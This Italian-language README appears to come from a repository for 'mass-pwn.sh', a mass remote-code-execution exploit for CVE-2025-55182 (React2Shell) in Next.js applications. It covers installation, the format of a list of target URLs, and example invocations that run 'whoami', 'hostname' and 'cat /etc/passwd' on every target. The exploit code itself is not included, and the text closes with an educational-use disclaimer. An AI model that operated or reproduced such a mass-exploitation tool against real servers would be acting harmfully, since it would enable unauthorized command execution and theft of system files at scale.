
CVE-2025-55182 payload
Un exploit RCE di massa modificato per CVE-2025-55182 (React2Shell) che prende di mira le applicazioni Next.js.
Questo strumento è una modifica dello script PoC originale di pax-k. Mentre lo script originale prende di mira un singolo host, questa versione è migliorata per supportare la scansione di massa da un elenco di URL, automatizzando l'iniezione del payload, l'esecuzione dei comandi e l'analisi dell'output per una valutazione efficiente delle vulnerabilità.
list.txt).curl, openssl e utility bash standard.Un grande ringraziamento ai ricercatori di sicurezza e ai team che hanno scoperto questa vulnerabilità:
Assicurati di avere un ambiente Linux (Kali Linux, Ubuntu, ecc.) con i seguenti strumenti installati:
bashcurlopensslgrep & cutClona o scarica lo script.
Rendi eseguibile lo script:
chmod +x mass-pwn.sh
Crea un file di testo (es. list.txt) e aggiungi i tuoi URL target riga per riga. Assicurati di includere il protocollo (http:// o https://).
nano list.txt
Formato:
Plaintext
[https://target-one.com](https://target-one.com)
[http://vulnerable-site.net](http://vulnerable-site.net)
[https://testing.corp.local:3000](https://testing.corp.local:3000)
Esegui lo script fornendo il file dell'elenco dei target e il comando che desideri eseguire.
Sintassi:
Bash
./mass-pwn.sh <list_file> "" Esempi:
Controlla l'utente corrente su tutti i target:
Bash
./mass-pwn.sh list.txt "whoami" Controlla hostname:
Bash
./mass-pwn.sh list.txt "hostname" Tenta di leggere file di sistema (se vulnerabile):
Bash
./mass-pwn.sh list.txt "cat /etc/passwd" ⚠️ Disclaimer Legale SOLO A SCOPO EDUCATIVO.
Questo strumento è sviluppato e distribuito esclusivamente per la ricerca sulla sicurezza, i test di penetrazione autorizzati e scopi educativi.
Nessuna Responsabilità: L'autore e i collaboratori NON sono responsabili per eventuali danni, perdita di dati, compromissione del server o problemi legali causati dall'uso improprio di questo strumento.
Nessun Uso Non Autorizzato: Non utilizzare questo strumento contro sistemi, reti o applicazioni che non possiedi o per i quali non hai un'autorizzazione esplicita e scritta per testarli.
Conseguenze Legali: L'accesso non autorizzato a sistemi informatici è illegale e punibile dalla legge. Sei l'unico responsabile delle tue azioni e di eventuali conseguenze legali che potrebbero derivare.
Utilizzando questo script, accetti di comprendere questi termini e di non utilizzare questo strumento per scopi dannosi.